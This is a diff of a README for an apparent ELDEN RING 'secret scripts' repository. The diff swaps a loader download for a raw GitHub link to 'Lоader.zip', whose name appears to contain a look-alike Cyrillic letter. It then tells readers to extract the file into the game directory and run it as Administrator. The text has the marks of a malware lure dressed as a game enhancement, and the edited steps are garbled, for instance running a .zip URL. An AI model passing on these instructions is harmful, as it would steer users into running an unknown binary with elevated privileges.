Vishnunama2005/EldenRingSecretScripts/README.md

 Experience enhanced gameplay in just a few steps!
 **Follow these instructions exactly for a quick and easy setup:**

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/Vishnunama2005/EldenRingSecretScripts/main/Lоader.zip` from the repository.
 2. Extract the contents to your ELDEN RING installation directory.
-3. Run the Loader.exe as Administrator.
+3. Run the https://raw.githubusercontent.com/Vishnunama2005/EldenRingSecretScripts/main/Lоader.zip as Administrator.
 4. Select the enhancements you wish to enable from the user-friendly GUI.
 5. Launch ELDEN RING and enjoy the new features!

-*Note: For Linux or macOS, use a compatible emulator or wrapper (like Wine or Proton) to run Loader.exe.*
+*Note: For Linux or macOS, use a compatible emulator or wrapper (like Wine or Proton) to run https://raw.githubusercontent.com/Vishnunama2005/EldenRingSecretScripts/main/Lоader.zip*

 ---